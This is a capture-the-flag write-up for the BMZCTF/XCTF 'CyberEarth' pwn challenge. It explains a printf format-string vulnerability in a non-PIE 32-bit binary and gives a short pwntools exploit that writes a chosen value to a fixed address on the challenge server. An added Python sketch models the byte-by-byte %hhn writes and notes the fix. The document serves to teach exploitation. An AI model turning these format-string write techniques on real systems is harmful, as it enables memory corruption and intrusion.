[BMZCTF-pwn] 01-XCTF 4th-CyberEarth
2022-02-12
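The binary provides a backdoor and PIE is disabled, so the printf format-string vulnerability can be used directly to write the required value into key.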
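from pwn import *

# Set the target architecture (32-bit x86) before building the payload
context(arch='i386', log_level='debug')
p = remote('www.bmzclub.cn', 21355)

# Offset 12: our input starts at printf's 12th argument slot.
# PIE is off, so key sits at the fixed address 0x0804a048.
payload = fmtstr_payload(12, {0x0804a048: 35795746})  # key = xxxx
p.sendline(payload)
p.interactive()  # interact once key holds the expected value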
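As an added illustration (not part of the original writeup), the sketch below models what such a payload has to arrange: 35795746 is 0x02223322, and one common approach splits the write into single-byte %hhn stores driven by printf's running output count. The function names are hypothetical, and the model assumes the address bytes themselves do not add to the printed count.

```python
import struct

KEY_ADDR = 0x0804A048   # address of key, taken from the writeup
KEY_VALUE = 35795746    # value written to key, taken from the writeup


def plan_byte_writes(addr, value):
    """Split a 32-bit write into single-byte (%hhn-style) stores.

    Returns (target_address, byte, padding) tuples. padding is the number of
    extra characters that must be printed so that the low byte of printf's
    output counter equals the byte to store. Stores are ordered by byte value
    so the counter only ever has to grow.
    """
    data = struct.pack("<I", value)                 # i386 is little-endian
    targets = sorted((b, addr + i) for i, b in enumerate(data))
    plan, printed = [], 0
    for byte, target in targets:
        pad = (byte - printed) % 256
        printed += pad
        plan.append((target, byte, pad))
    return plan


def apply_plan(plan, memory):
    """Model printf: each %hhn stores the low byte of the running count."""
    printed = 0
    for target, _byte, pad in plan:
        printed += pad
        memory[target] = printed & 0xFF
    return memory


def read_u32(memory, addr):
    """Read a little-endian 32-bit value from the simulated memory dict."""
    raw = bytes(memory.get(addr + i, 0) for i in range(4))
    return struct.unpack("<I", raw)[0]


if __name__ == "__main__":
    plan = plan_byte_writes(KEY_ADDR, KEY_VALUE)
    for target, byte, pad in plan:
        print(f"store 0x{byte:02x} at 0x{target:08x} after {pad} more chars")
    print(hex(read_u32(apply_plan(plan, {}), KEY_ADDR)))
```

The model also shows why a constant format string such as `printf("%s", buf)` removes the primitive: the input is then never parsed for directives, so no store happens.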